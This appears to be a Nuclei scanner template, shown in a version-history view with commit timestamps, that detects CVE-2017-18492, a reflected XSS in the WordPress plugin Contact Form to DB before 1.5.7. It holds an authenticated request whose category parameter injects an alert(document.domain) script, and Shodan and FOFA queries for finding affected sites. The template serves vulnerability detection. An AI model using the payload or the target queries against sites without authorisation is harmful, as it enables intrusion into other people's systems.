2023-10-25 12:04:43 +00:00
|
|
|
id: CVE-2017-18492
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting
|
|
|
|
author: luisfelipe146
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues.
|
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-18492
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18492
|
|
|
|
- https://wordpress.org/plugins/contact-form-to-db/#developers
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2017-18492
|
|
|
|
cwe-id: CWE-79
|
2023-10-25 17:36:19 +00:00
|
|
|
epss-score: 0.00088
|
2024-04-08 11:34:33 +00:00
|
|
|
epss-percentile: 0.36245
|
2023-10-25 12:04:43 +00:00
|
|
|
cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:*
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 3
|
|
|
|
vendor: bestwebsoft
|
|
|
|
product: contact_form_to_db
|
|
|
|
framework: wordpress
|
2024-05-31 19:23:20 +00:00
|
|
|
shodan-query: http.html:/wp-content/plugins/contact-form-to-db/
|
|
|
|
fofa-query: body=/wp-content/plugins/contact-form-to-db/
|
2024-06-07 10:04:29 +00:00
|
|
|
publicwww-query: "/wp-content/plugins/contact-form-to-db/"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft
|
2023-10-25 12:04:43 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /wp-login.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
|
|
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
|
|
GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'status_code_2 == 200'
|
|
|
|
- 'contains(header_2, "text/html")'
|
|
|
|
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
|
|
|
|
- 'contains(body_3, "Contact Form to DB by")'
|
2023-10-25 07:33:43 +00:00
|
|
|
condition: and
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 4a0a00473045022100a811b54fa65cdad8be00d6d92397705da1b9063b6a59665a6715a66c0b84a7c602201ec9474bf2f76977a1de15bfd3ca2c9d706ac5864862d9961f7536936cc3c660:922c64590222798bb761d5b6d8e72950
|